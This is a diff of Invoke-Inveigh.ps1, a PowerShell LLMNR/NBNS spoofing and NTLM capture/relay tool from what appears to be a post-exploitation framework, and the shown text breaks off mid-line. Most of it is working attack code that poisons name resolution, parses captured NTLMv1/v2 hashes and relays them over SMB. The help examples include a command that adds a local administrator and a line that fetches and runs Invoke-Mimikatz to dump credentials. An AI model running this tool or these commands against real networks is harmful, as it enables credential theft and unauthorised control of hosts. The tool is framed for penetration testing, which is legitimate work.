diff --git a/data/module_source/collection/Invoke-Inveigh.ps1 b/data/module_source/collection/Invoke-Inveigh.ps1 index 433bf0e..c656c99 100644 --- a/data/module_source/collection/Invoke-Inveigh.ps1 +++ b/data/module_source/collection/Invoke-Inveigh.ps1 @@ -1,254 +1,794 @@ -function Invoke-Inveigh { - <# - .SYNOPSIS - Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB. +Function Invoke-Inveigh +{ +<# +.SYNOPSIS +Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP(S)/SMB and NTLMv2 HTTP to SMB relay. +.DESCRIPTION +Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. +This can commonly occur while performing standard post exploitation, phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. +.PARAMETER IP +Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpoofIP' parameter is not set. +.PARAMETER SpooferIP +Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. +.PARAMETER LLMNR +Default = Enabled: Enable/Disable LLMNR spoofing. +.PARAMETER NBNS +Default = Disabled: Enable/Disable NBNS spoofing. +.PARAMETER NBNSTypes +Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name +.PARAMETER Repeat +Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. +.PARAMETER SpoofList +Default = All: Comma separated list of hostnames to spoof with LLMNR and NBNS. +.PARAMETER HTTP +Default = Enabled: Enable/Disable HTTP challenge/response capture. +.PARAMETER HTTPS +Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. +If the script does not exit gracefully, execute "netsh http delete sslcert ipport=" and manually remove the certificate from "Local Computer\Personal" in the cert store. +.PARAMETER SMB +Default = Enabled: Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. +Block TCP ports 445/139 if you need to prevent login requests from being processed by the Inveigh host. +.PARAMETER Challenge +Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. +.PARAMETER MachineAccounts +Default = Disabled: Enable/Disable showing NTLM challenge/response captures from machine accounts. +.PARAMETER ForceWPADAuth +Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts. +.PARAMETER SMBRelay +Default = Disabled: Enable/Disable SMB relay. +.PARAMETER SMBRelayTarget +IP address of system to target for SMB relay. +.PARAMETER SMBRelayCommand +Command to execute on SMB relay target. +.PARAMETER SMBRelayUsernames +Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. +.PARAMETER SMBRelayAutoDisable +Default = Enable: Automaticaly disable SMB relay after a successful command execution on target. +.PARAMETER SMBRelayNetworkTimeout +Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent. +.PARAMETER ConsoleOutput +Default = Disabled: Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. +.PARAMETER FileOutput +Default = Disabled: Enable/Disable real time file output. +.PARAMETER StatusOutput +Default = Enabled: Enable/Disable statup and shutdown messages. +.PARAMETER OutputStreamOnly +Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. +Note that you will not see the various yellow warning messages if enabled. +.PARAMETER OutputDir +Default = Working Directory: Set an output directory for log and capture files. +.PARAMETER ShowHelp +Default = Enabled: Enable/Disable the help messages at startup. +.PARAMETER RunTime +Set the run time duration in minutes. +.PARAMETER Tool +Default = 0: Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +.EXAMPLE +Import-Module .\Inveigh.psd1;Invoke-Inveigh +Import full module and execute with all default settings. +.EXAMPLE +. ./Inveigh.ps1;Invoke-Inveigh -IP +Dot source load and execute specifying a specific local listening/spoofing IP. +.EXAMPLE +Invoke-Inveigh -IP -HTTP N +Execute specifying a specific local listening/spoofing IP and disabling HTTP challenge/response. +.EXAMPLE +Invoke-Inveigh -Repeat N -ForceWPADAuth N -SpoofList host1,host2 +Execute with the stealthiest options. +.EXAMPLE +Invoke-Inveigh -HTTP N -LLMNR N +Execute with LLMNR/NBNS spoofing disabled and challenge/response capture over SMB only. This may be useful for capturing non-Kerberos authentication attempts on a file server. +.EXAMPLE +Invoke-Inveigh -IP -SpooferIP -HTTP N +Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be useful for sending traffic to a controlled Linux system on another subnet. +.EXAMPLE +Invoke-Inveigh -SMBRelay y -SMBRelayTarget -SMBRelayCommand "net user Dave Summer2015 /add && net localgroup administrators Dave /add" +Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target. +.EXAMPLE +Invoke-Inveigh -SMBRelay Y -SMBRelayTarget -SMBRelayCommand "powershell \\\temp$\powermeup.cmd" +Execute with SMB relay enabled and using Mubix's powermeup.cmd method of launching Invoke-Mimikatz.ps1 and uploading output. In this example, a hidden anonymous share containing Invoke-Mimikatz.ps1 is employed on the Inveigh host system. +Powermeup.cmd contents used for this example: +powershell "IEX (New-Object Net.WebClient).DownloadString('\\\temp$\Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\\temp$\%COMPUTERNAME%.txt 2>&1" +Original version: +https://github.com/mubix/post-exploitation/blob/master/scripts/mass_mimikatz/powermeup.cmd +.NOTES +1. An elevated administrator or SYSTEM shell is needed. +2. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture. +3. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets. +4. SMB challenge/response captures are performed by sniffing over the host system's SMB service. +5. HTTP challenge/response captures are performed with a dedicated listener. +6. The local LLMNR/NBNS services do not need to be disabled on the host system. +7. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. +8. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS. +9. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system. +10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns. +11. SMB relay support is experimental at this point, use caution if employing on a pen test. +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> - .DESCRIPTION - Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. +# Default parameter values can be modified below +param +( + [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$IP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP = "", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTP="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTPS="N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMB="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$LLMNR="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="N", + [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes=@("00","20"), + [parameter(Mandatory=$false)][array]$SpoofList="", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelay="N", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="", + [parameter(Mandatory=$false)][array]$SMBRelayUsernames, + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y", + [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="", + [parameter(Mandatory=$false)][string]$SMBRelayCommand = "", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Repeat="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ForceWPADAuth="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$FileOutput="N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$OutputStreamOnly="N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$MachineAccounts="N", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="", + [parameter(Mandatory=$false)][int]$RunTime="", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y", + [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter +) - .PARAMETER IP - Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpoofIP' parameter is not set. +if ($invalid_parameter) +{ + throw "$($invalid_parameter) is not a valid parameter." +} - .PARAMETER SpooferIP - Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to another system. +if(!$IP) +{ + $IP = (Test-Connection -count 1 | select -ExpandProperty Ipv4Address) +} - .PARAMETER HTTP - Default = Enabled: Enable/Disable HTTP challenge/response capture. +if(!$SpooferIP) +{ + $SpooferIP = $IP +} - .PARAMETER HTTPS - Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=" and manually remove the certificate from "Local Computer\Personal" in the cert store. - - .PARAMETER SMB - Default = Enabled: Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. - - .PARAMETER LLMNR - Default = Enabled: Enable/Disable LLMNR spoofing. - - .PARAMETER NBNS - Default = Disabled: Enable/Disable NBNS spoofing. - - .PARAMETER NBNSTypes - Default = 20: Enable/Disable NBNS types. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name - - .PARAMETER Repeat - Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. - - .PARAMETER ForceWPADAuth - Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts. - - .PARAMETER Output - Default = Console/File Output Enabled: Enable/Disable most console output and all file output. 0 = Console Enabled/File Enabled, 1 = Console Enabled/File Disabled, 2 = Console Disabled/File Enabled - - .PARAMETER OutputDir - Default = Working Directory: Set an output directory for log and capture files. - - .EXAMPLE - ./Inveigh.ps1 - Execute with all default settings. - - .EXAMPLE - ./Inveigh.ps1 -IP - Execute specifying a specific local listening/spoofing IP. - - .EXAMPLE - ./Inveigh.ps1 -IP -HTTP N - Execute specifying a specific local listening/spoofing IP and disabling HTTP challenge/response. - - .EXAMPLE - ./Inveigh.ps1 -Repeat N -ForceWPADAuth N - Execute with the stealthiest options. - - .EXAMPLE - ./Inveigh.ps1 -HTTP N -LLMNR N - Execute with LLMNR/NBNS spoofing disabled and challenge/response capture over SMB only. This may be useful for capturing non-Kerberos authentication attempts on a file server. - - .EXAMPLE - ./Inveigh.ps1 -IP -SpooferIP -HTTP N - Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be useful for sending traffic to a controlled Linux system on another subnet. - - .NOTES - 1. An elevated administrator or SYSTEM shell is needed. - 2. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture. - 3. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets. - 4. SMB challenge/response captures are performed by sniffing over the host system's SMB service. - 5. HTTP challenge/response captures are performed with a dedicated listener. - 6. The local LLMNR/NBNS services do not need to be disabled on the host system. - 7. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. - 8. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS. - 9. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system. - 10. Output files will be created in current working directory. - 11. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns. - #> - - param - ( - [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$IP = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP = "", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTP="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTPS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMB="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$LLMNR="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="N", - [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes="20", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Repeat="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ForceWPADAuth="Y", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Output="0", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="", - [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter - ) - - if ($invalid_parameter) +if($SMBRelay -eq 'y') +{ + if(!$SMBRelayTarget) { - throw "$($invalid_parameter) is not a valid parameter." + Throw "You must specify an -SMBRelayTarget if enabling -SMBRelay" } - if(-not($IP)) - { - $IP = (Test-Connection -count 1 | select -ExpandProperty Ipv4Address) - } - - if(-not($SpooferIP)) + if(!$SMBRelayCommand) { - $SpooferIP = $IP + Throw "You must specify an -SMBRelayCommand if enabling -SMBRelay" } +} - if(-not($OutputDir)) - { - $output_directory = $PWD.Path +if(!$OutputDir) +{ + $output_directory = $PWD.Path +} +else +{ + $output_directory = $OutputDir +} + +if(!$inveigh) +{ + $global:inveigh = [hashtable]::Synchronized(@{}) + $inveigh.log = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList + $inveigh.IP_capture_list = @() + $inveigh.SMBRelay_failed_list = @() +} + +$inveigh.running = $false +$inveigh.sniffer_socket = $null + +if($inveigh.HTTP_listener.IsListening) +{ + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() +} + +$inveigh.console_queue = New-Object System.Collections.ArrayList +$inveigh.status_queue = New-Object System.Collections.ArrayList +$inveigh.log_file_queue = New-Object System.Collections.ArrayList +$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList +$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList +$inveigh.certificate_thumbprint = "76a49fd27011cf4311fb6914c904c90a89f3e4b2" +$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList +$inveigh.console_output = $false +$inveigh.console_input = $true +$inveigh.file_output = $false +$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" +$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" +$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" +$Inveigh.challenge = $Challenge +$inveigh.running = $true + +if($StatusOutput -eq 'y') +{ + $inveigh.status_output = $true +} +else +{ + $inveigh.status_output = $false +} + +if($OutputStreamOnly -eq 'y') +{ + $inveigh.output_stream_only = $true +} +else +{ + $inveigh.output_stream_only = $false +} + +if($Tool -eq 1) # Metasploit Interactive PowerShell +{ + $inveigh.tool = 1 + $inveigh.output_stream_only = $true + $inveigh.newline = "" + $ConsoleOutput = "N" +} +elseif($Tool -eq 2) # PowerShell Empire +{ + $inveigh.tool = 2 + $inveigh.output_stream_only = $true + $inveigh.console_input = $false + $inveigh.newline = "`n" + $ConsoleOutput = "Y" + $ShowHelp = "N" +} +else +{ + $inveigh.tool = 0 + $inveigh.newline = "" +} + +# Write startup messages +$inveigh.status_queue.add("Inveigh started at $(Get-Date -format 's')")|Out-Null +$inveigh.log.add("$(Get-Date -format 's') - Inveigh started") |Out-Null + +if($FileOutput -eq 'y') +{ + "$(Get-Date -format 's') - Inveigh started" |Out-File $Inveigh.log_out_file -Append +} + +$inveigh.status_queue.add("Listening IP Address = $IP") |Out-Null +$inveigh.status_queue.add("LLMNR/NBNS Spoofer IP Address = $SpooferIP")|Out-Null + +if($LLMNR -eq 'y') +{ + $inveigh.status_queue.add("LLMNR Spoofing Enabled")|Out-Null + $LLMNR_response_message = "- spoofed response has been sent" +} +else +{ + $inveigh.status_queue.add("LLMNR Spoofing Disabled")|Out-Null + $LLMNR_response_message = "- LLMNR spoofing is disabled" +} + +if($SpoofList -and ($LLMNR -eq 'y' -or $NBNS -eq 'y')) +{ + $spoof_list_output = $SpoofList -join "," + $inveigh.status_queue.add("Spoofing only $spoof_list_output")|Out-Null +} + +if($NBNS -eq 'y') +{ + $NBNSTypes_output = $NBNSTypes -join "," + + if($NBNSTypes.Count -eq 1) + { + $inveigh.status_queue.add("NBNS Spoofing Of Type $NBNSTypes_output Enabled")|Out-Null } else { - $output_directory = $OutputDir + $inveigh.status_queue.add("NBNS Spoofing Of Types $NBNSTypes_output Enabled")|Out-Null } + + $NBNS_response_message = "- spoofed response has been sent" +} +else +{ + $inveigh.status_queue.add("NBNS Spoofing Disabled")|Out-Null + $NBNS_response_message = "- NBNS spoofing is disabled" +} - $log_out_file = $output_directory + "\Inveigh-Log.txt" - $NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" - $NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" - $certificate_thumbprint = "76a49fd27011cf4311fb6914c904c90a89f3e4b2" +if($Repeat -eq 'n') +{ + $inveigh.repeat = $false + $inveigh.status_queue.add("Spoof Repeating Disabled")|Out-Null +} +else +{ + $inveigh.repeat = $true + $inveigh.IP_capture_list = @() +} - # Write startup messages - $start_time = Get-Date - Write-Output "Inveigh started at $(Get-Date -format 's')`n" +if($HTTP -eq 'y') +{ + $inveigh.HTTP = $true + $inveigh.status_queue.add("HTTP Capture Enabled")|Out-Null +} +else +{ + $inveigh.HTTP = $false + $inveigh.status_queue.add("HTTP Capture Disabled")|Out-Null +} - if(($Output -eq 0) -or ($Output -eq 2)) +if($HTTPS -eq 'y') +{ + try { - # "Inveigh started at $(Get-Date -format 's')" |Out-File $log_out_file -Append + $inveigh.HTTPS = $true + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 + $certificate.Import($PWD.Path + "\inveigh.pfx") + $certificate_store.Add($certificate) + $certificate_store.Close() + Invoke-Expression -command ("netsh http add sslcert ipport= certhash=" + $inveigh.certificate_thumbprint + " appid='{00112233-4455-6677-8899-AABBCCDDEEFF}'") > $null + $inveigh.status_queue.add("HTTPS Capture Enabled")|Out-Null } - - Write-Output "Listening IP Address = $IP`n" - Write-Output "LLMNR/NBNS Spoofer IP Address = $SpooferIP`n" - - if($LLMNR -eq 'y') + catch { - Write-Output "LLMNR Spoofing Enabled`n" - $LLMNR_response_message = "- spoofed response has been sent" + $certificate_store.Close() + $HTTPS="N" + $inveigh.HTTPS = $false + $inveigh.status_queue.add("HTTPS Capture Disabled Due To Certificate Install Error")|Out-Null + } +} +else +{ + $inveigh.status_queue.add("HTTPS Capture Disabled")|Out-Null +} + +if($Challenge) +{ + $inveigh.status_queue.add("NTLM Challenge = $Challenge")|Out-Null +} + +if($SMB -eq 'y') +{ + $inveigh.status_queue.add("SMB Capture Enabled")|Out-Null +} +else +{ + $inveigh.status_queue.add("SMB Capture Disabled")|Out-Null +} + +if($MachineAccounts -eq 'n') +{ + $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null +} + +if($ForceWPADAuth -eq 'y') +{ + $inveigh.status_queue.add("Force WPAD Authentication Enabled")|Out-Null +} +else +{ + $inveigh.status_queue.add("Force WPAD Authentication Disabled")|Out-Null +} + +if($ConsoleOutput -eq 'y') +{ + $inveigh.status_queue.add("Real Time Console Output Enabled")|Out-Null + $inveigh.console_output = $true +} +else +{ + if($inveigh.tool -eq 1) + { + $inveigh.status_queue.add("Real Time Console Output Disabled Due To External Tool Selection")|Out-Null } else { - Write-Output "LLMNR Spoofing Disabled`n" - $LLMNR_response_message = "- LLMNR spoofing is disabled" + $inveigh.status_queue.add("Real Time Console Output Disabled")|Out-Null } +} - if($NBNS -eq 'y') +if($FileOutput -eq 'y') +{ + $inveigh.status_queue.add("Real Time File Output Enabled")|Out-Null + $inveigh.status_queue.add("Output Directory = $output_directory")|Out-Null + $inveigh.file_output = $true +} +else +{ + $inveigh.status_queue.add("Real Time File Output Disabled")|Out-Null +} + +if($RunTime -eq 1) +{ + $inveigh.status_queue.add("Run Time = $RunTime Minute")|Out-Null +} +elseif($RunTime -gt 1) +{ + $inveigh.status_queue.add("Run Time = $RunTime Minutes")|Out-Null +} + +if($SMBRelay -eq 'n') +{ + + if($ShowHelp -eq 'y') { - $NBNSTypes_output = $NBNSTypes -join "," + $inveigh.status_queue.add("Use Get-Command -Noun Inveigh* to show available functions")|Out-Null + $inveigh.status_queue.add("Run Stop-Inveigh to stop Inveigh")|Out-Null - if($NBNSTypes.Count -eq 1) + if($inveigh.console_output) { - Write-Output "NBNS Spoofing Of Type $NBNSTypes_output Enabled`n" + $inveigh.status_queue.add("Press any key to stop real time console output")|Out-Null + } + } + if($inveigh.status_output) + { + while($inveigh.status_queue.Count -gt 0) + { + if($inveigh.output_stream_only) + { + write-output($inveigh.status_queue[0] + $inveigh.newline) + $inveigh.status_queue.RemoveRange(0,1) + } + else + { + switch ($inveigh.status_queue[0]) + { + "Run Stop-Inveigh to stop Inveigh" + { + write-warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveRange(0,1) + } + default + { + write-output($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveRange(0,1) + } + } + } + } + } +} +else +{ + Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -MachineAccounts $MachineAccounts -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp +} + +# Begin ScriptBlocks + +# Shared Basic Functions ScriptBlock +$shared_basic_functions_scriptblock = +{ + Function DataToUInt16($field) + { + [Array]::Reverse($field) + return [BitConverter]::ToUInt16($field,0) + } + + Function DataToUInt32($field) + { + [Array]::Reverse($field) + return [BitConverter]::ToUInt32($field,0) + } + + Function DataLength + { + param ([int]$length_start,[byte[]]$string_extract_data) + + $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0) + return $string_length + } + + Function DataToString + { + param ([int]$string_length,[int]$string2_length,[int]$string3_length,[int]$string_start,[byte[]]$string_extract_data) + + $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length-1)]) + $string_data = $string_data -replace "-00","" + $string_data = $string_data.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} + $string_extract = New-Object System.String ($string_data,0,$string_data.Length) + return $string_extract + } +} + +# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response +$SMB_NTLM_functions_scriptblock = +{ + Function SMBNTLMChallenge + { + param ([byte[]]$payload_bytes) + + $payload = [System.BitConverter]::ToString($payload_bytes) + $payload = $payload -replace "-","" + $NTLM_index = $payload.IndexOf("4E544C4D53535000") + + if($payload.SubString(($NTLM_index + 16),8) -eq "02000000") + { + $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16) + } + + return $NTLM_challenge + } + + Function SMBNTLMResponse + { + param ([byte[]]$payload_bytes) + + $payload = [System.BitConverter]::ToString($payload_bytes) + $payload = $payload -replace "-","" + $NTLM_index = $payload.IndexOf("4E544C4D53535000") + $NTLM_bytes_index = $NTLM_index / 2 + + if($payload.SubString(($NTLM_index + 16),8) -eq "03000000") + { + $LM_length = DataLength ($NTLM_bytes_index + 12) $payload_bytes + $LM_offset = $payload_bytes[($NTLM_bytes_index + 16)] + + if($LM_length -ge 24) + { + $NTLM_length = DataLength ($NTLM_bytes_index + 20) $payload_bytes + $NTLM_offset = $payload_bytes[($NTLM_bytes_index + 24)] + + $NTLM_domain_length = DataLength ($NTLM_bytes_index + 28) $payload_bytes + $NTLM_domain_offset = DataLength ($NTLM_bytes_index + 32) $payload_bytes + $NTLM_domain_string = DataToString $NTLM_domain_length 0 0 ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes + + $NTLM_user_length = DataLength ($NTLM_bytes_index + 36) $payload_bytes + $NTLM_user_string = DataToString $NTLM_user_length $NTLM_domain_length 0 ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes + + $NTLM_host_length = DataLength ($NTLM_bytes_index + 44) $payload_bytes + $NTLM_host_string = DataToString $NTLM_host_length $NTLM_user_length $NTLM_domain_length ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes + + if(([BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $LM_offset)..($NTLM_bytes_index + $LM_offset + $LM_length - 1)]) -replace "-","") -eq ("00" * $LM_length)) + { + $NTLMv2_response = [System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $NTLM_offset)..($NTLM_bytes_index + $NTLM_offset + $NTLM_length - 1)]) -replace "-","" + $NTLMv2_response = $NTLMv2_response.Insert(32,':') + $NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response + + if(($source_IP -ne $IP) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $NTLM_user_string.EndsWith('$'))))) + { + $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")]) + $inveigh.NTLMv2_file_queue.add($NTLMv2_hash) + $inveigh.NTLMv2_list.add($NTLMv2_hash) + $inveigh.console_queue.add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash") + + if($inveigh.file_output) + { + $inveigh.console_queue.add("SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) + } + } + } + else + { + $NTLMv1_response = [System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $LM_offset)..($NTLM_bytes_index + $LM_offset + $NTLM_length + $LM_length - 1)]) -replace "-","" + $NTLMv1_response = $NTLMv1_response.Insert(48,':') + $NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLMv1_response + ":" + $NTLM_challenge + + if(($source_IP -ne $IP) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $NTLM_user_string.EndsWith('$'))))) + { + $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")]) + $inveigh.NTLMv1_file_queue.add($NTLMv1_hash) + $inveigh.NTLMv1_list.add($NTLMv1_hash) + $inveigh.console_queue.add("$(Get-Date -format 's') SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash") + + if($inveigh.file_output) + { + $inveigh.console_queue.add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) + } + + } + } + + if (($inveigh.IP_capture_list -notcontains $source_IP) -and (-not $NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat) -and ($source_IP -ne $IP)) + { + $inveigh.IP_capture_list += $source_IP + } + } + } + } +} + +# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener +$HTTP_scriptblock = +{ + param ($MachineAccounts,$ForceWPADAuth) + + Function NTLMChallengeBase64 + { + + $HTTP_timestamp = Get-Date + $HTTP_timestamp = $HTTP_timestamp.ToFileTime() + $HTTP_timestamp = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_timestamp)) + $HTTP_timestamp = $HTTP_timestamp.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} + + if($Inveigh.challenge) + { + $HTTP_challenge = $Inveigh.challenge + $HTTP_challenge_bytes = $Inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') + $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} } else { - Write-Output "NBNS Spoofing Of Types $NBNSTypes_output Enabled`n" + $HTTP_challenge_bytes = [String](1..8 | % {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', '' + $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} + } + + $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) |Out-Null + + [byte[]]$HTTP_NTLM_bytes = 